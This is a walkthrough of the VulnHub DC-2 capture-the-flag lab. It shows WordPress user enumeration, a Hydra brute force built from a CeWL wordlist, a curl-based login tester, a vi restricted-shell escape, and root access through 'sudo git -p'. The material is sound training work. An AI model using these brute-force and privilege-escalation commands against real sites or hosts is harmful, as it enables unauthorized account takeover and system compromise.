VulnHub – DC-2

Software Used:
Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64 GNU/Linux
Nmap 7.70
Firefox 60.4.0esr (64-bit)
DIRB v2.22
WPScan 3.4.3
CeWL 5.4.3
Hydra v8.8

I started with a ping sweep to determine DC-2's IP address using nmap -sn 10.0.2.* (quote the wildcard, or use 10.0.2.0/24, so the shell does not try to expand it as a glob).

After this I added DC-2's IP address to my hosts file (/etc/hosts) under the name dc-2. WordPress redirects to the hostname it is configured with, http://dc-2, so this lets the web application display correctly and stops any annoyances with redirects.

A full port scan using nmap -A -p- reveals an HTTP server on port 80 and SSH running on an unusual port, 7744.

Navigating to the webpage http://dc-2 reveals the first of 5 flags, along with a hint.

There are a few things to do at this point:

  • Find where to log in
  • Find who to log in as
  • Find their password

The first point is easily addressed with dirb http://dc-2, which brute-forces directory and file names under the web root.

Navigating to /wp-admin redirects to the WordPress login page; now to find a username.

For this section I used wpscan --url http://dc-2 -e
WPScan is an automated WordPress scanning tool: give it a URL and it will scan the site. The -e option enumerates the site for anything that could be useful; with no argument that includes user enumeration, which is what matters here.

WPScan has identified 10 vulnerabilities! Unfortunately none of these seem to be the intended route to the next flag. Sadly, even after trying a few of them I couldn’t achieve a shell.

It has, however, found three usernames: admin, tom and jerry.

The next step is cracking their passwords; the first flag had a hint about cewl.

CeWL is a tool that spiders a website and generates a wordlist from the unique words it finds.
I used cewl -w Desktop/dc2.txt http://dc-2
This writes all of the unique words found at the given URL to the file named after -w.
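The same word-extraction step, as an added example that is not part of the original write-up or of CeWL itself. It is a minimal POSIX sh stand-in for what CeWL does with a page (strip the HTML, split into words, keep words of at least the default minimum length of 3, print each unique word once), so the wordlist can be rebuilt offline from a saved copy of the page. The sample HTML inside it is constructed, not the real DC-2 site.

```sh
# Added example (not from the original write-up, not CeWL's code): a minimal
# CeWL-style word extractor. Reads HTML on stdin, writes one unique word per
# line. Like CeWL it keeps the original case and uses a minimum length of 3.
wordlist_from_html() {
    minlen="${1:-3}"
    tr '\n' ' ' \
      | sed -e 's/<[^>]*>/ /g' \
      | tr -cs '[:alpha:]' '\n' \
      | awk -v n="$minlen" 'length($0) >= n' \
      | sort -u
}
# Pipeline, step by step:
#   tr '\n' ' '              collapse the page onto one line so tags that span
#                            lines are still matched by the next step
#   sed 's/<[^>]*>/ /g'      replace every tag (and its attributes) with a space
#   tr -cs '[:alpha:]' '\n'  keep only letters, one word per line
#   awk 'length($0) >= n'    drop words shorter than the minimum length
#   sort -u                  one copy of each word

# Constructed sample page (not the real DC-2 site) for a stand-alone run.
SAMPLE_HTML='<html><head><title>DC-2</title></head>
<body><div class="entry-content"><p>Lorem ipsum dolor sit amet, consectetur
adipiscing elit. Nascetur parturient montes, ridiculus mus.</p></div>
<a href="/wp-login.php">Log in</a></body></html>'

# Build the list from the sample and return how many words it contains.
sample_wordlist_size() {
    printf '%s\n' "$SAMPLE_HTML" | wordlist_from_html | wc -l | tr -d ' '
}

# Usage against a live page (needs network):
#   curl -s http://dc-2 | wordlist_from_html > Desktop/dc2.txt
```

Note that, like CeWL, this preserves case: a word that only appears capitalised on the page is only emitted capitalised, so it is worth checking the list for both forms of a promising word before giving up on it.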

With my completed wordlist I used Hydra to brute-force the login. To do this I first had to collect a bit of information about how the login form is structured: on the login page I opened Firefox's developer tools (Inspect Element) and went to the Network tab, which shows all of the requests sent and received by the page.

After attempting to log in as Tom with a random password I had most of the information I needed.

First of all, I can see that the form sends a POST request to wp-login.php.
Scrolling down reveals the parameters that I am posting to the server.

The highlighted section in the request body is what I need to build my Hydra command. All that is needed now is an error message, or some other marker, that tells Hydra whether a login attempt was unsuccessful or successful (I tried the error message shown on the page but this didn't work; I presume because it's not in the HTML header).
I used curl to analyse the HTML header.

Scrolling further down I found a lostpassword link ("Lost your password?"). It wouldn't make any sense to show that once logged in, so I used it as the failure marker and successfully built a command around it.

The command I built was
hydra -L Desktop/dc2users.txt -P Desktop/dc2.txt <IP of dc-2> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&testcookie=1:F=Lost your password?" -vV -w 4 -t 4

Breaking this down:
hydra – the program that I am running.
-L Desktop/dc2users.txt – the login list I created containing just tom and jerry; Hydra substitutes each entry for ^USER^.
-P Desktop/dc2.txt – the password list I created earlier with CeWL; Hydra substitutes each entry for ^PASS^.
<IP of dc-2> – the target, the IP address of dc-2 (redacted here).
http-post-form – the service/form module that I am attacking.
"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&testcookie=1:F=Lost your password?" – this is split into three sections by ":": the path of the form being attacked, the POST body with the ^USER^ and ^PASS^ placeholders, and the failure condition (F=, a string that appears in the response only when the login failed). One thing worth knowing: Hydra fetches the form page first and reuses any cookies it sets, so the wordpress_test_cookie that wp-login.php insists on when testcookie=1 is posted is sent automatically.
-vV -w 4 -t 4 – very verbose (show every attempt), wait at most 4 seconds for a response, and run 4 parallel connections.

The password for Jerry was successfully found: adipiscing. Tom's wasn't found, but I did notice that there was a redirect part way through the run for Tom.

This led me to believe that the password was found but Hydra didn't register it, so I tweaked the command slightly to attempt just Tom's password.

I changed the -L parameter to -l tom, which tells Hydra to only attempt the username tom. I also changed the concurrent tasks to 2 (-t 2) to lessen the odds of a false positive/negative. Finally I added -f, which tells Hydra to stop when a successful match is found.

This was successful and found the password parturient.
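A way to confirm a Hydra hit, or to re-test a guess that Hydra reported inconsistently, as the Tom redirect above did: an added example, not part of the original write-up. Instead of looking for the "Lost your password?" failure text it decides on what wp-login.php actually does on success (a 302 redirect to wp-admin plus a wordpress_logged_in_* cookie). The dc-2 hostname is assumed from the /etc/hosts entry above; the sample responses are constructed, not captured from the box.

```sh
# Added example (not from the original write-up): classify a WordPress login
# reply and send a single guess with curl.

# Read one HTTP response (status line, headers, blank line, body) from stdin
# and print "success" or "failure".
classify_wp_login() {
    # keep only the header block, and drop CRs so the anchors below match
    headers="$(sed '/^[[:space:]]*$/q' | tr -d '\r')"
    if printf '%s\n' "$headers" | grep -qi '^Set-Cookie: wordpress_logged_in_'; then
        echo success
    elif printf '%s\n' "$headers" | grep -q '^HTTP/[0-9.]* 30[12]' \
      && printf '%s\n' "$headers" | grep -qi '^Location: .*/wp-admin/'; then
        echo success
    else
        echo failure
    fi
}

# Send one username/password to the live target and classify the reply.
# Two details matter: --data-urlencode protects special characters in the
# password, and the wordpress_test_cookie has to be sent, because wp-login.php
# rejects an otherwise valid login when testcookie=1 is posted without it
# (Hydra gets that cookie by fetching the form page first). Needs network, so
# the offline test only exercises classify_wp_login.
try_wp_login() {
    user="$1"; pass="$2"; target="${3:-http://dc-2}"
    curl -si "$target/wp-login.php" \
        --cookie 'wordpress_test_cookie=WP Cookie check' \
        --data-urlencode "log=$user" \
        --data-urlencode "pwd=$pass" \
        --data-urlencode 'wp-submit=Log In' \
        --data-urlencode "redirect_to=$target/wp-admin/" \
        --data-urlencode 'testcookie=1' \
      | classify_wp_login
}

# Constructed sample replies in the shape WordPress 4.x returns (not captured
# from DC-2), so the classifier can be exercised without a target.
WP_FAIL_RESPONSE='HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<div id="login_error"><strong>ERROR</strong>: The password you entered for the username <strong>tom</strong> is incorrect. <a href="http://dc-2/wp-login.php?action=lostpassword">Lost your password?</a></div>'

WP_OK_RESPONSE='HTTP/1.1 302 Found
Set-Cookie: wordpress_logged_in_0a1b2c=tom%7C1546300800%7Cabcdef; path=/; HttpOnly
Location: http://dc-2/wp-admin/
Content-Length: 0
'

# Usage against the box once a candidate is in hand:
#   try_wp_login tom parturient
```

Checking the redirect and cookie rather than a failure string is the more robust condition: the failure text can be absent for unrelated reasons (a cookie error page, a lockout plugin, a changed theme), whereas WordPress only sets the logged-in cookie after wp_signon has accepted the credentials.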

I logged in as Tom but found nothing interesting, after logging in as Jerry I found the 2nd flag.

Before this I was thinking that I might upload a reverse shell of some sort, but after reading the flag I remembered the unusual SSH port number.

Logging in over SSH as Jerry with the password I found was unsuccessful.

But logging in as Tom using ssh tom@<IP of dc-2> -p 7744 was successful!

The id command doesn't work; I've dealt with something similar before on UD64. I am in a restricted shell, so I need to find a way to escape it, right after reading flag3.

Really...? To find out what commands I can use I ran compgen -A function -c, which lists the shell functions and commands available to me. After looking through this quite extensive list, just like in UD64, vi is available to me; however, this time a slightly different approach was needed.

I used vi flag3.txt to read the flag first of all, and while I was there I ran :set shell=/bin/bash followed by :shell, which drops me into an unrestricted bash spawned by vi.

After this I changed $PATH to allow me to use more commands on the machine, using export PATH=/bin:/usr/bin:$PATH. This only works from the escaped shell, since a restricted shell refuses to let you change PATH.

I confirmed this had worked by using cat, which was previously unavailable.

The hint in the flag mentions su, the command to switch users. Before I tried this I checked whether any SUID binaries exist and what sudo privileges Tom has, using find / -perm -u=s -type f 2>/dev/null and sudo -l respectively; however, there is nothing of interest here.

Using su jerry with the password I cracked earlier to switch to Jerry's account is successful.

I switched to Jerry's home directory using cd $HOME, followed by ls -la, which revealed flag4.txt. After reading this I tried sudo -l to see what commands Jerry can run through sudo, and git was revealed.

Running sudo git -p forces git to page its output through less, and since git is running under sudo, so is the pager. From the less prompt, ! runs a shell command, so I simply used !/bin/bash to open bash as root.

Now it's just a case of switching to root's home directory and reading the final flag.

This machine gave me a few stumbling blocks, and I’m sure there’s an easier way to do it, but it was definitely a fun one to do!
